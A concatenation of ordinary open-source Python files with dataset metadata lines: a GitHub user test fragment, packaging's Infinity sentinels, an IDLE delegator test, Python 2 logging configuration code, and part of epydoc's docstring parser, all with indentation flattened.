def testGetNotifications(self):
self.assertListKeyEqual(self.user.get_notifications(participating=True), lambda n: n.id, ["8406712"])
def testGetNotificationsWithOtherArguments(self):
self.assertListKeyEqual(self.user.get_notifications(all=True), lambda n: n.id, [])
def testGetTeams(self):
self.assertListKeyEqual(self.user.get_teams(), lambda t: t.name, ["Owners", "Honoraries", "Honoraries", "Honoraries", "Honoraries", "Honoraries", "Honoraries", "Honoraries", "Honoraries", "Honoraries"])
| mit |
Distrotech/buck | third-party/py/setuptools/pkg_resources/_vendor/packaging/_structures.py | 906 | 1809 | # Copyright 2014 Donald Stufft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
class Infinity(object):
def __repr__(self):
return "Infinity"
def __hash__(self):
return hash(repr(self))
def __lt__(self, other):
return False
def __le__(self, other):
return False
def __eq__(self, other):
return isinstance(other, self.__class__)
def __ne__(self, other):
return not isinstance(other, self.__class__)
def __gt__(self, other):
return True
def __ge__(self, other):
return True
def __neg__(self):
return NegativeInfinity
Infinity = Infinity()
class NegativeInfinity(object):
def __repr__(self):
return "-Infinity"
def __hash__(self):
return hash(repr(self))
def __lt__(self, other):
return True
def __le__(self, other):
return True
def __eq__(self, other):
return isinstance(other, self.__class__)
def __ne__(self, other):
return not isinstance(other, self.__class__)
def __gt__(self, other):
return False
def __ge__(self, other):
return False
def __neg__(self):
return Infinity
NegativeInfinity = NegativeInfinity()
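# Illustrative sketch, not part of the original module: the two sentinels order
# above/below every other value via the rich comparisons defined above, which is
# how the surrounding packaging code can use them as padding when comparing
# version components.
if __name__ == "__main__":  # pragma: no cover -- demonstration only
    assert Infinity > 9999                # __gt__ always returns True
    assert NegativeInfinity < (0, 0)      # __lt__ always returns True
    assert -Infinity is NegativeInfinity  # unary minus flips to the other sentinel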
| apache-2.0 |
FFMG/myoddweb.piger | monitor/api/python/Python-3.7.2/Lib/idlelib/idle_test/test_delegator.py | 11 | 1567 | "Test delegator, coverage 100%."
from idlelib.delegator import Delegator
import unittest
class DelegatorTest(unittest.TestCase):
def test_mydel(self):
# Test a simple use scenario.
# Initialize an int delegator.
mydel = Delegator(int)
self.assertIs(mydel.delegate, int)
self.assertEqual(mydel._Delegator__cache, set())
# Trying to access a non-attribute of int fails.
self.assertRaises(AttributeError, mydel.__getattr__, 'xyz')
# Add real int attribute 'bit_length' by accessing it.
bl = mydel.bit_length
self.assertIs(bl, int.bit_length)
self.assertIs(mydel.__dict__['bit_length'], int.bit_length)
self.assertEqual(mydel._Delegator__cache, {'bit_length'})
# Add attribute 'numerator'.
mydel.numerator
self.assertEqual(mydel._Delegator__cache, {'bit_length', 'numerator'})
# Delete 'numerator'.
del mydel.numerator
self.assertNotIn('numerator', mydel.__dict__)
# The current implementation leaves it in the name cache.
# self.assertIn('numerator', mydel._Delegator__cache)
# However, this is not required and not part of the specification
# Change delegate to float, first resetting the attributes.
mydel.setdelegate(float) # calls resetcache
self.assertNotIn('bit_length', mydel.__dict__)
self.assertEqual(mydel._Delegator__cache, set())
self.assertIs(mydel.delegate, float)
if __name__ == '__main__':
unittest.main(verbosity=2, exit=2)
| gpl-2.0 |
sudkannan/xen-hv | tools/python/logging/logging-0.4.9.2/logging/config.py | 42 | 11911 | # Copyright 2001-2004 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Configuration functions for the logging package for Python. The core package
is based on PEP 282 and comments thereto in comp.lang.python, and influenced
by Apache's log4j system.
Should work under Python versions >= 1.5.2, except that source line
information is not available unless 'sys._getframe()' is.
Copyright (C) 2001-2004 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging' and log away!
"""
import sys, logging, logging.handlers, string, thread, threading, socket, struct, os, types  # types is used in the socket.error handler below
from SocketServer import ThreadingTCPServer, StreamRequestHandler
DEFAULT_LOGGING_CONFIG_PORT = 9030
if sys.platform == "win32":
RESET_ERROR = 10054 #WSAECONNRESET
else:
RESET_ERROR = 104 #ECONNRESET
#
# The following code implements a socket listener for on-the-fly
# reconfiguration of logging.
#
# _listener holds the server object doing the listening
_listener = None
def fileConfig(fname, defaults=None):
"""
Read the logging configuration from a ConfigParser-format file.
This can be called several times from an application, allowing an end user
the ability to select from various pre-canned configurations (if the
developer provides a mechanism to present the choices and load the chosen
configuration).
In versions of ConfigParser which have the readfp method [typically
shipped in 2.x versions of Python], you can pass in a file-like object
rather than a filename, in which case the file-like object will be read
using readfp.
"""
import ConfigParser
cp = ConfigParser.ConfigParser(defaults)
if hasattr(cp, 'readfp') and hasattr(fname, 'readline'):
cp.readfp(fname)
else:
cp.read(fname)
#first, do the formatters...
flist = cp.get("formatters", "keys")
if len(flist):
flist = string.split(flist, ",")
formatters = {}
for form in flist:
sectname = "formatter_%s" % form
opts = cp.options(sectname)
if "format" in opts:
fs = cp.get(sectname, "format", 1)
else:
fs = None
if "datefmt" in opts:
dfs = cp.get(sectname, "datefmt", 1)
else:
dfs = None
f = logging.Formatter(fs, dfs)
formatters[form] = f
#next, do the handlers...
#critical section...
logging._acquireLock()
try:
try:
#first, lose the existing handlers...
logging._handlers.clear()
#now set up the new ones...
hlist = cp.get("handlers", "keys")
if len(hlist):
hlist = string.split(hlist, ",")
handlers = {}
fixups = [] #for inter-handler references
for hand in hlist:
sectname = "handler_%s" % hand
klass = cp.get(sectname, "class")
opts = cp.options(sectname)
if "formatter" in opts:
fmt = cp.get(sectname, "formatter")
else:
fmt = ""
klass = eval(klass, vars(logging))
args = cp.get(sectname, "args")
args = eval(args, vars(logging))
h = apply(klass, args)
if "level" in opts:
level = cp.get(sectname, "level")
h.setLevel(logging._levelNames[level])
if len(fmt):
h.setFormatter(formatters[fmt])
#temporary hack for FileHandler and MemoryHandler.
if klass == logging.handlers.MemoryHandler:
if "target" in opts:
target = cp.get(sectname,"target")
else:
target = ""
if len(target): #the target handler may not be loaded yet, so keep for later...
fixups.append((h, target))
handlers[hand] = h
#now all handlers are loaded, fixup inter-handler references...
for fixup in fixups:
h = fixup[0]
t = fixup[1]
h.setTarget(handlers[t])
#at last, the loggers...first the root...
llist = cp.get("loggers", "keys")
llist = string.split(llist, ",")
llist.remove("root")
sectname = "logger_root"
root = logging.root
log = root
opts = cp.options(sectname)
if "level" in opts:
level = cp.get(sectname, "level")
log.setLevel(logging._levelNames[level])
for h in root.handlers[:]:
root.removeHandler(h)
hlist = cp.get(sectname, "handlers")
if len(hlist):
hlist = string.split(hlist, ",")
for hand in hlist:
log.addHandler(handlers[hand])
#and now the others...
#we don't want to lose the existing loggers,
#since other threads may have pointers to them.
#existing is set to contain all existing loggers,
#and as we go through the new configuration we
#remove any which are configured. At the end,
#what's left in existing is the set of loggers
#which were in the previous configuration but
#which are not in the new configuration.
existing = root.manager.loggerDict.keys()
#now set up the new ones...
for log in llist:
sectname = "logger_%s" % log
qn = cp.get(sectname, "qualname")
opts = cp.options(sectname)
if "propagate" in opts:
propagate = cp.getint(sectname, "propagate")
else:
propagate = 1
logger = logging.getLogger(qn)
if qn in existing:
existing.remove(qn)
if "level" in opts:
level = cp.get(sectname, "level")
logger.setLevel(logging._levelNames[level])
for h in logger.handlers[:]:
logger.removeHandler(h)
logger.propagate = propagate
logger.disabled = 0
hlist = cp.get(sectname, "handlers")
if len(hlist):
hlist = string.split(hlist, ",")
for hand in hlist:
logger.addHandler(handlers[hand])
#Disable any old loggers. There's no point deleting
#them as other threads may continue to hold references
#and by disabling them, you stop them doing any logging.
for log in existing:
root.manager.loggerDict[log].disabled = 1
except:
import traceback
ei = sys.exc_info()
traceback.print_exception(ei[0], ei[1], ei[2], None, sys.stderr)
del ei
finally:
logging._releaseLock()
def listen(port=DEFAULT_LOGGING_CONFIG_PORT):
"""
Start up a socket server on the specified port, and listen for new
configurations.
These will be sent as a file suitable for processing by fileConfig().
Returns a Thread object on which you can call start() to start the server,
and which you can join() when appropriate. To stop the server, call
stopListening().
"""
if not thread:
raise NotImplementedError, "listen() needs threading to work"
class ConfigStreamHandler(StreamRequestHandler):
"""
Handler for a logging configuration request.
It expects a completely new logging configuration and uses fileConfig
to install it.
"""
def handle(self):
"""
Handle a request.
Each request is expected to be a 4-byte length,
followed by the config file. Uses fileConfig() to do the
grunt work.
"""
import tempfile
try:
conn = self.connection
chunk = conn.recv(4)
if len(chunk) == 4:
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
#Apply new configuration. We'd like to be able to
#create a StringIO and pass that in, but unfortunately
#1.5.2 ConfigParser does not support reading file
#objects, only actual files. So we create a temporary
#file and remove it later.
file = tempfile.mktemp(".ini")
f = open(file, "w")
f.write(chunk)
f.close()
fileConfig(file)
os.remove(file)
except socket.error, e:
if type(e.args) != types.TupleType:
raise
else:
errcode = e.args[0]
if errcode != RESET_ERROR:
raise
class ConfigSocketReceiver(ThreadingTCPServer):
"""
A simple TCP socket-based logging config receiver.
"""
allow_reuse_address = 1
def __init__(self, host='localhost', port=DEFAULT_LOGGING_CONFIG_PORT,
handler=None):
ThreadingTCPServer.__init__(self, (host, port), handler)
logging._acquireLock()
self.abort = 0
logging._releaseLock()
self.timeout = 1
def serve_until_stopped(self):
import select
abort = 0
while not abort:
rd, wr, ex = select.select([self.socket.fileno()],
[], [],
self.timeout)
if rd:
self.handle_request()
logging._acquireLock()
abort = self.abort
logging._releaseLock()
def serve(rcvr, hdlr, port):
server = rcvr(port=port, handler=hdlr)
global _listener
logging._acquireLock()
_listener = server
logging._releaseLock()
server.serve_until_stopped()
return threading.Thread(target=serve,
args=(ConfigSocketReceiver,
ConfigStreamHandler, port))
def stopListening():
"""
Stop the listening server which was created with a call to listen().
"""
global _listener
if _listener:
logging._acquireLock()
_listener.abort = 1
_listener = None
logging._releaseLock()
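# Illustrative sketch, not part of the original module: a minimal ConfigParser
# file that fileConfig() above would accept. The section and option names follow
# the format parsed by fileConfig(); the "logging.ini" filename is an assumption.
#
#   [loggers]
#   keys=root
#
#   [handlers]
#   keys=console
#
#   [formatters]
#   keys=plain
#
#   [logger_root]
#   level=DEBUG
#   handlers=console
#
#   [handler_console]
#   class=StreamHandler
#   level=DEBUG
#   formatter=plain
#   args=(sys.stderr,)
#
#   [formatter_plain]
#   format=%(asctime)s %(levelname)s %(message)s
#
# and then, from application code:
#
#   import logging.config
#   logging.config.fileConfig("logging.ini")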
| gpl-2.0 |
da1z/intellij-community | python/helpers/epydoc/docstringparser.py | 91 | 45421 | # epydoc -- Docstring processing
#
# Copyright (C) 2005 Edward Loper
# Author: Edward Loper <[email protected]>
# URL: <http://epydoc.sf.net>
#
# $Id: docstringparser.py 1689 2008-01-30 17:01:02Z edloper $
"""
Parse docstrings and handle any fields it defines, such as C{@type}
and C{@author}. Fields are used to describe specific information
about an object. There are two classes of fields: X{simple fields}
and X{special fields}.
Simple fields are fields that get stored directly in an C{APIDoc}'s
metadata dictionary, without any special processing. The set of
simple fields is defined by the list L{STANDARD_FIELDS}, whose
elements are L{DocstringField}s.
Special fields are fields that perform some sort of processing on the
C{APIDoc}, or add information to attributes other than the metadata
dictionary. Special fields are are handled by field handler
functions, which are registered using L{register_field_handler}.
"""
__docformat__ = 'epytext en'
######################################################################
## Imports
######################################################################
import re, sys
from epydoc import markup
from epydoc.markup import epytext
from epydoc.apidoc import *
from epydoc.docintrospecter import introspect_docstring_lineno
from epydoc.util import py_src_filename
from epydoc import log
import epydoc.docparser
import __builtin__, exceptions
######################################################################
# Docstring Fields
######################################################################
class DocstringField:
"""
A simple docstring field, which can be used to describe specific
information about an object, such as its author or its version.
Simple docstring fields are fields that take no arguments, and
are displayed as simple sections.
@ivar tags: The set of tags that can be used to identify this
field.
@ivar singular: The label that should be used to identify this
field in the output, if the field contains one value.
@ivar plural: The label that should be used to identify this
field in the output, if the field contains multiple values.
@ivar short: If true, then multiple values should be combined
into a single comma-delimited list. If false, then
multiple values should be listed separately in a bulleted
list.
@ivar multivalue: If true, then multiple values may be given
for this field; if false, then this field can only take a
single value, and a warning should be issued if it is
redefined.
@ivar takes_arg: If true, then this field expects an argument;
and a separate field section will be constructed for each
argument value. The label (and plural label) should include
a '%s' to mark where the argument's string rep should be
added.
"""
def __init__(self, tags, label, plural=None,
short=0, multivalue=1, takes_arg=0,
varnames=None):
if type(tags) in (list, tuple):
self.tags = tuple(tags)
elif type(tags) is str:
self.tags = (tags,)
else: raise TypeError('Bad tags: %s' % tags)
self.singular = label
if plural is None: self.plural = label
else: self.plural = plural
self.multivalue = multivalue
self.short = short
self.takes_arg = takes_arg
self.varnames = varnames or []
def __cmp__(self, other):
if not isinstance(other, DocstringField): return -1
return cmp(self.tags, other.tags)
def __hash__(self):
return hash(self.tags)
def __repr__(self):
return '<Field: %s>' % self.tags[0]
STANDARD_FIELDS = [
#: A list of the standard simple fields accepted by epydoc. This
#: list can be augmented at run-time by a docstring with the special
#: C{@deffield} field. The order in which fields are listed here
#: determines the order in which they will be displayed in the
#: output.
# If it's deprecated, put that first.
DocstringField(['deprecated', 'depreciated'],
'Deprecated', multivalue=0, varnames=['__deprecated__']),
# Status info
DocstringField(['version'], 'Version', multivalue=0,
varnames=['__version__']),
DocstringField(['date'], 'Date', multivalue=0,
varnames=['__date__']),
DocstringField(['status'], 'Status', multivalue=0),
# Bibliographic Info
DocstringField(['author', 'authors'], 'Author', 'Authors', short=1,
varnames=['__author__', '__authors__']),
DocstringField(['contact'], 'Contact', 'Contacts', short=1,
varnames=['__contact__']),
DocstringField(['organization', 'org'],
'Organization', 'Organizations'),
DocstringField(['copyright', '(c)'], 'Copyright', multivalue=0,
varnames=['__copyright__']),
DocstringField(['license'], 'License', multivalue=0,
varnames=['__license__']),
# Various warnings etc.
DocstringField(['bug'], 'Bug', 'Bugs'),
DocstringField(['warning', 'warn'], 'Warning', 'Warnings'),
DocstringField(['attention'], 'Attention'),
DocstringField(['note'], 'Note', 'Notes'),
# Formal conditions
DocstringField(['requires', 'require', 'requirement'], 'Requires'),
DocstringField(['precondition', 'precond'],
'Precondition', 'Preconditions'),
DocstringField(['postcondition', 'postcond'],
'Postcondition', 'Postconditions'),
DocstringField(['invariant'], 'Invariant'),
# When was it introduced (version # or date)
DocstringField(['since'], 'Since', multivalue=0),
# Changes made
DocstringField(['change', 'changed'], 'Change Log'),
# Crossreferences
DocstringField(['see', 'seealso'], 'See Also', short=1),
# Future Work
DocstringField(['todo'], 'To Do', takes_arg=True),
# Permissions (used by zope-based projects)
DocstringField(['permission', 'permissions'], 'Permission', 'Permissions')
]
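# Illustrative sketch, not taken from the original source: a docstring that uses
# a few of the simple fields listed above. When parse_docstring() (below) splits
# such a docstring into fields, each tag that matches a DocstringField ends up in
# the APIDoc's metadata list. The function name and field values are assumptions.
#
#   def frobnicate(x):
#       """
#       Frobnicate C{x} in place.
#
#       @author: A. Nonymous
#       @version: 1.2
#       @see: L{defrobnicate}
#       """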
######################################################################
#{ Docstring Parsing
######################################################################
DEFAULT_DOCFORMAT = 'epytext'
"""The name of the default markup languge used to process docstrings."""
# [xx] keep track of which ones we've already done, in case we're
# asked to process one twice? e.g., for @include we might have to
# parse the included docstring earlier than we might otherwise..??
def parse_docstring(api_doc, docindex, suppress_warnings=[]):
"""
Process the given C{APIDoc}'s docstring. In particular, populate
the C{APIDoc}'s C{descr} and C{summary} attributes, and add any
information provided by fields in the docstring.
@param docindex: A DocIndex, used to find the containing
module (to look up the docformat); and to find any
user docfields defined by containing objects.
@param suppress_warnings: A set of objects for which docstring
warnings should be suppressed.
"""
if api_doc.metadata is not UNKNOWN:
if not (isinstance(api_doc, RoutineDoc)
and api_doc.canonical_name[-1] == '__init__'):
log.debug("%s's docstring processed twice" %
api_doc.canonical_name)
return
initialize_api_doc(api_doc)
# If there's no docstring, then check for special variables (e.g.,
# __version__), and then return -- there's nothing else to do.
if (api_doc.docstring in (None, UNKNOWN)):
if isinstance(api_doc, NamespaceDoc):
for field in STANDARD_FIELDS + user_docfields(api_doc, docindex):
add_metadata_from_var(api_doc, field)
return
# Remove leading indentation from the docstring.
api_doc.docstring = unindent_docstring(api_doc.docstring)
# Decide which docformat is used by this module.
docformat = get_docformat(api_doc, docindex)
# A list of markup errors from parsing.
parse_errors = []
# Extract a signature from the docstring, if it has one. This
# overrides any signature we got via introspection/parsing.
if isinstance(api_doc, RoutineDoc):
parse_function_signature(api_doc, None, docformat, parse_errors)
# Parse the docstring. Any errors encountered are stored as
# `ParseError` objects in the errors list.
parsed_docstring = markup.parse(api_doc.docstring, docformat,
parse_errors)
# Divide the docstring into a description and a list of
# fields.
descr, fields = parsed_docstring.split_fields(parse_errors)
api_doc.descr = descr
field_warnings = []
# Handle the constructor fields that have been defined in the class
# docstring. This code assumes that a class docstring is parsed before
# the same class __init__ docstring.
if isinstance(api_doc, ClassDoc):
# Parse ahead the __init__ docstring for this class
initvar = api_doc.variables.get('__init__')
if initvar and isinstance(initvar.value, RoutineDoc):
init_api_doc = initvar.value
parse_docstring(init_api_doc, docindex, suppress_warnings)
parse_function_signature(init_api_doc, api_doc,
docformat, parse_errors)
init_fields = split_init_fields(fields, field_warnings)
# Process fields
for field in init_fields:
try:
process_field(init_api_doc, docindex, field.tag(),
field.arg(), field.body())
except ValueError, e: field_warnings.append(str(e))
# Process fields
for field in fields:
try:
process_field(api_doc, docindex, field.tag(),
field.arg(), field.body())
except ValueError, e: field_warnings.append(str(e))
# Check to make sure that all type parameters correspond to
# some documented parameter.
check_type_fields(api_doc, field_warnings)
# Check for special variables (e.g., __version__)
if isinstance(api_doc, NamespaceDoc):
for field in STANDARD_FIELDS + user_docfields(api_doc, docindex):
add_metadata_from_var(api_doc, field)
# Extract a summary
if api_doc.summary is None and api_doc.descr is not None:
api_doc.summary, api_doc.other_docs = api_doc.descr.summary()
# If the summary is empty, but the return field is not, then use
# the return field to generate a summary description.
if (isinstance(api_doc, RoutineDoc) and api_doc.summary is None and
api_doc.return_descr is not None):
s, o = api_doc.return_descr.summary()
api_doc.summary = RETURN_PDS + s
api_doc.other_docs = o
# [XX] Make sure we don't have types/param descrs for unknown
# vars/params?
# Report any errors that occured
if api_doc in suppress_warnings:
if parse_errors or field_warnings:
log.info("Suppressing docstring warnings for %s, since it "
"is not included in the documented set." %
api_doc.canonical_name)
else:
report_errors(api_doc, docindex, parse_errors, field_warnings)
def add_metadata_from_var(api_doc, field):
for varname in field.varnames:
# Check if api_doc has a variable w/ the given name.
if varname not in api_doc.variables: continue
        # This check was moved here from before the for loop because we expect
        # to reach this point only rarely. The loop below runs more than once
        # only for fields with more than one varname, which currently is
        # only 'author'.
for md in api_doc.metadata:
if field == md[0]:
return # We already have a value for this metadata.
var_doc = api_doc.variables[varname]
if var_doc.value is UNKNOWN: continue
val_doc = var_doc.value
value = []
# Try extracting the value from the pyval.
ok_types = (basestring, int, float, bool, type(None))
if val_doc.pyval is not UNKNOWN:
if isinstance(val_doc.pyval, ok_types):
value = [val_doc.pyval]
elif field.multivalue:
if isinstance(val_doc.pyval, (tuple, list)):
for elt in val_doc.pyval:
if not isinstance(elt, ok_types): break
else:
value = list(val_doc.pyval)
# Try extracting the value from the parse tree.
elif val_doc.toktree is not UNKNOWN:
try: value = [epydoc.docparser.parse_string(val_doc.toktree)]
except KeyboardInterrupt: raise
except: pass
if field.multivalue and not value:
try: value = epydoc.docparser.parse_string_list(val_doc.toktree)
except KeyboardInterrupt: raise
except: raise
# Add any values that we found.
for elt in value:
if isinstance(elt, str):
elt = decode_with_backslashreplace(elt)
else:
elt = unicode(elt)
elt = epytext.ParsedEpytextDocstring(
epytext.parse_as_para(elt), inline=True)
# Add in the metadata and remove from the variables
api_doc.metadata.append( (field, varname, elt) )
# Remove the variable itself (unless it's documented)
if var_doc.docstring in (None, UNKNOWN):
del api_doc.variables[varname]
if api_doc.sort_spec is not UNKNOWN:
try: api_doc.sort_spec.remove(varname)
except ValueError: pass
def initialize_api_doc(api_doc):
"""A helper function for L{parse_docstring()} that initializes
the attributes that C{parse_docstring()} will write to."""
if api_doc.descr is UNKNOWN:
api_doc.descr = None
if api_doc.summary is UNKNOWN:
api_doc.summary = None
if api_doc.metadata is UNKNOWN:
api_doc.metadata = []
if isinstance(api_doc, RoutineDoc):
if api_doc.arg_descrs is UNKNOWN:
api_doc.arg_descrs = []
if api_doc.arg_types is UNKNOWN:
api_doc.arg_types = {}
if api_doc.return_descr is UNKNOWN:
api_doc.return_descr = None
if api_doc.return_type is UNKNOWN:
api_doc.return_type = None
if api_doc.exception_descrs is UNKNOWN:
api_doc.exception_descrs = []
if isinstance(api_doc, (VariableDoc, PropertyDoc)):
if api_doc.type_descr is UNKNOWN:
api_doc.type_descr = None
if isinstance(api_doc, NamespaceDoc):
if api_doc.group_specs is UNKNOWN:
api_doc.group_specs = []
if api_doc.sort_spec is UNKNOWN:
api_doc.sort_spec = []
def split_init_fields(fields, warnings):
"""
Remove the fields related to the constructor from a class docstring
fields list.
@param fields: The fields to process. The list will be modified in place
@type fields: C{list} of L{markup.Field}
@param warnings: A list to emit processing warnings
@type warnings: C{list}
@return: The C{fields} items to be applied to the C{__init__} method
@rtype: C{list} of L{markup.Field}
"""
init_fields = []
# Split fields in lists according to their argument, keeping order.
arg_fields = {}
args_order = []
i = 0
while i < len(fields):
field = fields[i]
# gather together all the fields with the same arg
if field.arg() is not None:
arg_fields.setdefault(field.arg(), []).append(fields.pop(i))
args_order.append(field.arg())
else:
i += 1
# Now check that for each argument there is at most a single variable
# and a single parameter, and at most a single type for each of them.
for arg in args_order:
ff = arg_fields.pop(arg, None)
if ff is None:
continue
var = tvar = par = tpar = None
for field in ff:
if field.tag() in VARIABLE_TAGS:
if var is None:
var = field
fields.append(field)
else:
warnings.append(
"There is more than one variable named '%s'"
% arg)
elif field.tag() in PARAMETER_TAGS:
if par is None:
par = field
init_fields.append(field)
else:
warnings.append(
"There is more than one parameter named '%s'"
% arg)
elif field.tag() == 'type':
if var is None and par is None:
# type before obj
tvar = tpar = field
else:
if var is not None and tvar is None:
tvar = field
if par is not None and tpar is None:
tpar = field
elif field.tag() in EXCEPTION_TAGS:
init_fields.append(field)
            else: # Unexpected field
fields.append(field)
# Put selected types into the proper output lists
if tvar is not None:
if var is not None:
fields.append(tvar)
else:
pass # [xx] warn about type w/o object?
if tpar is not None:
if par is not None:
init_fields.append(tpar)
else:
pass # [xx] warn about type w/o object?
return init_fields
def report_errors(api_doc, docindex, parse_errors, field_warnings):
"""A helper function for L{parse_docstring()} that reports any
markup warnings and field warnings that we encountered while
processing C{api_doc}'s docstring."""
if not parse_errors and not field_warnings: return
# Get the name of the item containing the error, and the
# filename of its containing module.
name = api_doc.canonical_name
module = api_doc.defining_module
if module is not UNKNOWN and module.filename not in (None, UNKNOWN):
try: filename = py_src_filename(module.filename)
except: filename = module.filename
else:
filename = '??'
# [xx] Don't report markup errors for standard builtins.
# n.b. that we must use 'is' to compare pyvals here -- if we use
# 'in' or '==', then a user __cmp__ method might raise an
# exception, or lie.
if isinstance(api_doc, ValueDoc) and api_doc != module:
if module not in (None, UNKNOWN) and module.pyval is exceptions:
return
for builtin_val in __builtin__.__dict__.values():
if builtin_val is api_doc.pyval:
return
# Get the start line of the docstring containing the error.
startline = api_doc.docstring_lineno
if startline in (None, UNKNOWN):
startline = introspect_docstring_lineno(api_doc)
if startline in (None, UNKNOWN):
startline = None
# Display a block header.
header = 'File %s, ' % filename
if startline is not None:
header += 'line %d, ' % startline
header += 'in %s' % name
log.start_block(header)
# Display all parse errors. But first, combine any errors
# with duplicate description messages.
if startline is None:
# remove dups, but keep original order:
dups = {}
for error in parse_errors:
message = error.descr()
if message not in dups:
log.docstring_warning(message)
dups[message] = 1
else:
# Combine line number fields for dup messages:
messages = {} # maps message -> list of linenum
for error in parse_errors:
error.set_linenum_offset(startline)
message = error.descr()
messages.setdefault(message, []).append(error.linenum())
message_items = messages.items()
message_items.sort(lambda a,b:cmp(min(a[1]), min(b[1])))
for message, linenums in message_items:
linenums = [n for n in linenums if n is not None]
if len(linenums) == 0:
log.docstring_warning(message)
elif len(linenums) == 1:
log.docstring_warning("Line %s: %s" % (linenums[0], message))
else:
linenums = ', '.join(['%s' % l for l in linenums])
log.docstring_warning("Lines %s: %s" % (linenums, message))
# Display all field warnings.
for warning in field_warnings:
log.docstring_warning(warning)
# End the message block.
log.end_block()
RETURN_PDS = markup.parse('Returns:', markup='epytext')
"""A ParsedDocstring containing the text 'Returns'. This is used to
construct summary descriptions for routines that have empty C{descr},
but non-empty C{return_descr}."""
RETURN_PDS._tree.children[0].attribs['inline'] = True
######################################################################
#{ Field Processing Error Messages
######################################################################
UNEXPECTED_ARG = '%r did not expect an argument'
EXPECTED_ARG = '%r expected an argument'
EXPECTED_SINGLE_ARG = '%r expected a single argument'
BAD_CONTEXT = 'Invalid context for %r'
REDEFINED = 'Redefinition of %s'
UNKNOWN_TAG = 'Unknown field tag %r'
BAD_PARAM = '@%s for unknown parameter %s'
######################################################################
#{ Field Processing
######################################################################
def process_field(api_doc, docindex, tag, arg, descr):
"""
Process a single field, and use it to update C{api_doc}. If
C{tag} is the name of a special field, then call its handler
function. If C{tag} is the name of a simple field, then use
C{process_simple_field} to process it. Otherwise, check if it's a
user-defined field, defined in this docstring or the docstring of
a containing object; and if so, process it with
C{process_simple_field}.
@param tag: The field's tag, such as C{'author'}
@param arg: The field's optional argument
@param descr: The description following the field tag and
argument.
@raise ValueError: If a problem was encountered while processing
the field. The C{ValueError}'s string argument is an
explanation of the problem, which should be displayed as a
warning message.
"""
# standard special fields
if tag in _field_dispatch_table:
handler = _field_dispatch_table[tag]
handler(api_doc, docindex, tag, arg, descr)
return
# standard simple fields & user-defined fields
for field in STANDARD_FIELDS + user_docfields(api_doc, docindex):
if tag in field.tags:
# [xx] check if it's redefined if it's not multivalue??
if not field.takes_arg:
_check(api_doc, tag, arg, expect_arg=False)
api_doc.metadata.append((field, arg, descr))
return
# If we didn't handle the field, then report a warning.
raise ValueError(UNKNOWN_TAG % tag)
def user_docfields(api_doc, docindex):
"""
Return a list of user defined fields that can be used for the
given object. This list is taken from the given C{api_doc}, and
any of its containing C{NamepaceDoc}s.
@note: We assume here that a parent's docstring will always be
parsed before its childrens'. This is indeed the case when we
are called via L{docbuilder.build_doc_index()}. If a child's
docstring is parsed before its parents, then its parent won't
yet have had its C{extra_docstring_fields} attribute
initialized.
"""
docfields = []
# Get any docfields from `api_doc` itself
if api_doc.extra_docstring_fields not in (None, UNKNOWN):
docfields += api_doc.extra_docstring_fields
# Get any docfields from `api_doc`'s ancestors
for i in range(len(api_doc.canonical_name)-1, 0, -1):
ancestor = docindex.get_valdoc(api_doc.canonical_name[:i])
if ancestor is not None \
and ancestor.extra_docstring_fields not in (None, UNKNOWN):
docfields += ancestor.extra_docstring_fields
return docfields
_field_dispatch_table = {}
def register_field_handler(handler, *field_tags):
"""
Register the given field handler function for processing any
of the given field tags. Field handler functions should
have the following signature:
>>> def field_handler(api_doc, docindex, tag, arg, descr):
... '''update api_doc in response to the field.'''
Where C{api_doc} is the documentation object to update;
C{docindex} is a L{DocIndex} that can be used to look up the
documentation for related objects; C{tag} is the field tag that
was used; C{arg} is the optional argument; and C{descr} is the
description following the field tag and argument.
"""
for field_tag in field_tags:
_field_dispatch_table[field_tag] = handler
######################################################################
#{ Field Handler Functions
######################################################################
def process_summary_field(api_doc, docindex, tag, arg, descr):
"""Store C{descr} in C{api_doc.summary}"""
_check(api_doc, tag, arg, expect_arg=False)
if api_doc.summary is not None:
raise ValueError(REDEFINED % tag)
api_doc.summary = descr
def process_include_field(api_doc, docindex, tag, arg, descr):
"""Copy the docstring contents from the object named in C{descr}"""
_check(api_doc, tag, arg, expect_arg=False)
# options:
# a. just append the descr to our own
# b. append descr and update metadata
# c. append descr and process all fields.
# in any case, mark any errors we may find as coming from an
# imported docstring.
# how does this interact with documentation inheritance??
raise ValueError('%s not implemented yet' % tag)
def process_undocumented_field(api_doc, docindex, tag, arg, descr):
"""Remove any documentation for the variables named in C{descr}"""
_check(api_doc, tag, arg, context=NamespaceDoc, expect_arg=False)
for ident in _descr_to_identifiers(descr):
var_name_re = re.compile('^%s$' % ident.replace('*', '(.*)'))
for var_name, var_doc in api_doc.variables.items():
if var_name_re.match(var_name):
# Remove the variable from `variables`.
api_doc.variables.pop(var_name, None)
if api_doc.sort_spec is not UNKNOWN:
try: api_doc.sort_spec.remove(var_name)
except ValueError: pass
# For modules, remove any submodules that match var_name_re.
if isinstance(api_doc, ModuleDoc):
removed = set([m for m in api_doc.submodules
